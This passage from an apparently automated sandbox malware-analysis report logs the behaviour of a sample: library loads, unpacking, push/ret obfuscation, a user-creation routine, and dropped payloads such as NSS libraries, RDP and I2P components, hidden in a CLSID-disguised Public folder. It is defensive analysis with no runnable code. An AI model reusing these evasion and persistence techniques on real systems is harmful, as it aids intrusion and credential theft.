Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: faultrep.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dbgcore.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wer.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\euasv89vr56qz5toefmgc1.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Section loaded: apphelp.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Section loaded: cryptbase.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Section loaded: ntmarta.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Section loaded: iphlpapi.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Section loaded: winhttp.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Section loaded: wsock32.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Section loaded: mswsock.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Section loaded: windows.storage.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Section loaded: wldp.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Section loaded: netapi32.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Section loaded: userenv.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Section loaded: netutils.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Section loaded: samcli.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Section loaded: mswsock.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Section loaded: libi2p.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Section loaded: wsock32.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Section loaded: cryptsp.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Section loaded: rsaenh.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Section loaded: samlib.dll
Source: C:\Windows\System32\icacls.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\icacls.exe	Section loaded: ntmarta.dll

Source: C:\Users\user\Desktop\file.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32

Jump to behavior

Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe

File written: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\termsrv32.ini

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\file.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source: file.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: freebl3.pdb source: file.exe, 00000000.00000002.2771309518.0000000023AAE000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mozglue.pdbP source: file.exe, 00000000.00000002.2788158189.000000006C85D000.00000002.00000001.01000000.00000008.sdmp, file.exe, 00000000.00000002.2773812386.0000000029A18000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: freebl3.pdbp source: file.exe, 00000000.00000002.2771309518.0000000023AAE000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: nss3.pdb@ source: file.exe, 00000000.00000002.2783489358.00000000417CC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2788533136.000000006CA1F000.00000002.00000001.01000000.00000007.sdmp
Source:	Binary string: softokn3.pdb@ source: file.exe, 00000000.00000002.2778975346.00000000358FF000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: RfxVmt.pdb source: BFCAAEHJDB.exe, 00000007.00000003.2859028722.00000000044A4000.00000004.00000020.00020000.00000000.sdmp, BFCAAEHJDB.exe, 00000007.00000003.2850857977.00000000044A2000.00000004.00000020.00020000.00000000.sdmp, euasv89vr56qz5toefmgc1.exe, 0000000E.00000000.2871865920.00007FF67096E000.00000008.00000001.01000000.0000000C.sdmp, main.exe, 00000017.00000002.3440296730.000001E398B72000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: file.exe, 00000000.00000002.2781145830.000000003B860000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: file.exe, 00000000.00000002.2776697381.000000002F98F000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: nss3.pdb source: file.exe, 00000000.00000002.2783489358.00000000417CC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2788533136.000000006CA1F000.00000002.00000001.01000000.00000007.sdmp
Source:	Binary string: mozglue.pdb source: file.exe, 00000000.00000002.2788158189.000000006C85D000.00000002.00000001.01000000.00000008.sdmp, file.exe, 00000000.00000002.2773812386.0000000029A18000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: file.exe, 00000000.00000002.2768266325.000000001B807000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2767419498.00000000191C8000.00000002.00001000.00020000.00000000.sdmp
Source:	Binary string: RfxVmt.pdbGCTL source: BFCAAEHJDB.exe, 00000007.00000003.2859028722.00000000044A4000.00000004.00000020.00020000.00000000.sdmp, BFCAAEHJDB.exe, 00000007.00000003.2850857977.00000000044A2000.00000004.00000020.00020000.00000000.sdmp, euasv89vr56qz5toefmgc1.exe, 0000000E.00000000.2871865920.00007FF67096E000.00000008.00000001.01000000.0000000C.sdmp, main.exe, 00000017.00000002.3440296730.000001E398B72000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: softokn3.pdb source: file.exe, 00000000.00000002.2778975346.00000000358FF000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\file.exe

Unpacked PE file: 0.2.file.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;

Detected unpacking (creates a PE file in dynamic memory)

Source: C:\ProgramData\BFCAAEHJDB.exe

Unpacked PE file: 6.2.BFCAAEHJDB.exe.3370000.2.unpack

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\Desktop\file.exe

Unpacked PE file: 0.2.file.exe.400000.0.unpack

Binary contains a suspicious time stamp

Source: rfxvmt.dll.23.dr

Static PE information: 0xE004CD23 [Sat Feb 5 03:04:03 2089 UTC]

Contains functionality to dynamically determine API calls

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00417A40 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_00417A40

PE file contains an invalid checksum

Source: vcruntime140.dll.0.dr

Static PE information: real checksum: 0x16dd4 should be: 0x13f4f

PE file contains sections with non-standard names

Source: freebl3.dll.0.dr	Static PE information: section name: .00cfg
Source: mozglue.dll.0.dr	Static PE information: section name: .00cfg
Source: msvcp140.dll.0.dr	Static PE information: section name: .didat
Source: softokn3.dll.0.dr	Static PE information: section name: .00cfg
Source: nss3.dll.0.dr	Static PE information: section name: .00cfg
Source: BFCAAEHJDB.exe.0.dr	Static PE information: section name: .didata
Source: 7847438767[1].exe.0.dr	Static PE information: section name: .didata
Source: euasv89vr56qz5toefmgc1.exe.7.dr	Static PE information: section name: .xdata
Source: main.exe.14.dr	Static PE information: section name: .xdata
Source: evtsrv.dll.23.dr	Static PE information: section name: .xdata
Source: termsrv32.dll.23.dr	Static PE information: section name: .xdata
Source: rdpctl.dll.23.dr	Static PE information: section name: .xdata
Source: samctl.dll.23.dr	Static PE information: section name: .xdata
Source: prgmgr.dll.23.dr	Static PE information: section name: .xdata
Source: dwlmgr.dll.23.dr	Static PE information: section name: .xdata
Source: cnccli.dll.23.dr	Static PE information: section name: .xdata
Source: libi2p.dll.23.dr	Static PE information: section name: .xdata
Source: S7evpAMe.23.dr	Static PE information: section name: .xdata
Source: g29qQU9G.23.dr	Static PE information: section name: .xdata
Source: h0yu5TYE.23.dr	Static PE information: section name: .xdata
Source: Lx9RtFcl.23.dr	Static PE information: section name: .xdata
Source: fJw4qvYl.23.dr	Static PE information: section name: .xdata
Source: FHLBnhuN.23.dr	Static PE information: section name: .xdata
Source: 1kuzcKGx.23.dr	Static PE information: section name: .xdata
Source: KXEmxT2p.23.dr	Static PE information: section name: .xdata

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0041CDD5 push ecx; ret	0_2_0041CDE8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C81B536 push ecx; ret	0_2_6C81B549
Source: C:\ProgramData\BFCAAEHJDB.exe	Code function: 6_2_03326575 push esi; ret	6_2_03326577
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 23_2_00007FFDA38D72E8 push rsp; ret	23_2_00007FFDA38D72E9
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 23_2_00007FFDA38D72E4 push rsp; ret	23_2_00007FFDA38D72E5
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 23_2_00007FFDA38D72E0 push rsp; ret	23_2_00007FFDA38D72E1
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 23_2_00007FFDA38D727C push rsp; ret	23_2_00007FFDA38D727D
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 23_2_00007FFDA38D726F push qword ptr [rsi]; ret	23_2_00007FFDA38D7275
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 23_2_00007FFDA38D72BC push rsp; ret	23_2_00007FFDA38D72BD
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 23_2_00007FFDA38D72B8 push rsp; ret	23_2_00007FFDA38D72B9
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 23_2_00007FFDA38D72DC push rsp; ret	23_2_00007FFDA38D72DD
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 23_2_00007FFDA38D72D8 push rsp; ret	23_2_00007FFDA38D72D9
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 23_2_00007FFDA38D72D4 push rsp; ret	23_2_00007FFDA38D72D5
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 23_2_00007FFDA38D72D0 push rsp; ret	23_2_00007FFDA38D72D1
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 23_2_00007FFDA38D72CC push rsp; ret	23_2_00007FFDA38D72CD
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 23_2_00007FFDA38D72C4 push rsp; ret	23_2_00007FFDA38D72C5
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 23_2_00007FFDA38D79F7 push qword ptr [00007FFDD98D78C8h]; retf	23_2_00007FFDA38D79FD
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 23_2_00007FFDA38D79EF push qword ptr [00007FFDD98D78C0h]; retf	23_2_00007FFDA38D79F5
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 23_2_00007FFDA38D79E7 push qword ptr [00007FFDD98D78B8h]; retf	23_2_00007FFDA38D79ED
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 23_2_00007FFDA38D7A17 push qword ptr [00007FFDAA8D78E8h]; retf	23_2_00007FFDA38D7A1D
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 23_2_00007FFDA38D7A0F push qword ptr [00007FFDD98D78E0h]; retf	23_2_00007FFDA38D7A15
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 23_2_00007FFDA38D7A07 push qword ptr [00007FFDD98D78D8h]; retf	23_2_00007FFDA38D7A0D
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 23_2_00007FFDA38D79FF push qword ptr [00007FFDD98D78D0h]; retf	23_2_00007FFDA38D7A05
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 23_2_00007FFDA38D79BB push qword ptr [00007FFDD98D788Ch]; retf	23_2_00007FFDA38D79C1
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 23_2_00007FFDA38D79B3 push qword ptr [00007FFDD98D7884h]; retf	23_2_00007FFDA38D79B9
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 23_2_00007FFDA38D79D3 push qword ptr [00007FFDD98D78A4h]; retf	23_2_00007FFDA38D79D9
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 23_2_00007FFDA38D79CB push qword ptr [00007FFDD98D789Ch]; retf	23_2_00007FFDA38D79D1
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 23_2_00007FFDA38D79C3 push qword ptr [00007FFDD98D7894h]; retf	23_2_00007FFDA38D79C9

Contains functionality to create new users

Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe

Code function: 23_2_00007FFDA389875B strlen,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,strlen,strlen,GetProcessHeap,HeapAlloc,strlen,NetUserAdd,CreateProfile,

23_2_00007FFDA389875B

Drops PE files

Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\7847438767[1].exe	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	File created: C:\Windows\Temp\S7evpAMe	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	File created: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\prgmgr.dll	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	File created: C:\Windows\Temp\KXEmxT2p	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	File created: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\termsrv32.dll	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	File created: C:\Windows\Temp\h0yu5TYE	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	File created: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\rfxvmt.dll	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	File created: C:\Windows\Temp\1kuzcKGx	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	File created: C:\Windows\Temp\fJw4qvYl	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	File created: C:\Windows\Temp\FHLBnhuN	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	File created: C:\Windows\Temp\feJ0dymt	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\euasv89vr56qz5toefmgc1.exe	File created: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	File created: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\libi2p.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	File created: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\evtsrv.dll	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	File created: C:\Windows\Temp\g29qQU9G	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	File created: C:\Windows\Temp\Lx9RtFcl	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	File created: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\rdpctl.dll	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	File created: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\samctl.dll	Jump to dropped file
Source: C:\ProgramData\BFCAAEHJDB.exe	File created: C:\Users\user\AppData\Local\Temp\euasv89vr56qz5toefmgc1.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\BFCAAEHJDB.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	File created: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\cnccli.dll	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	File created: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\dwlmgr.dll	Jump to dropped file

Drops PE files to the application program directory (C:\ProgramData)

Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\BFCAAEHJDB.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file

Drops PE files to the windows directory (C:\Windows)

Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	File created: C:\Windows\Temp\g29qQU9G	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	File created: C:\Windows\Temp\S7evpAMe	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	File created: C:\Windows\Temp\Lx9RtFcl	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	File created: C:\Windows\Temp\KXEmxT2p	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	File created: C:\Windows\Temp\h0yu5TYE	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	File created: C:\Windows\Temp\1kuzcKGx	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	File created: C:\Windows\Temp\fJw4qvYl	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	File created: C:\Windows\Temp\FHLBnhuN	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	File created: C:\Windows\Temp\feJ0dymt	Jump to dropped file

Drops files with a non-matching file extension (content does not match file extension)

Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	File created: C:\Windows\Temp\S7evpAMe	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	File created: C:\Windows\Temp\g29qQU9G	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	File created: C:\Windows\Temp\feJ0dymt	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	File created: C:\Windows\Temp\h0yu5TYE	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	File created: C:\Windows\Temp\Lx9RtFcl	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	File created: C:\Windows\Temp\fJw4qvYl	Jump to dropped file
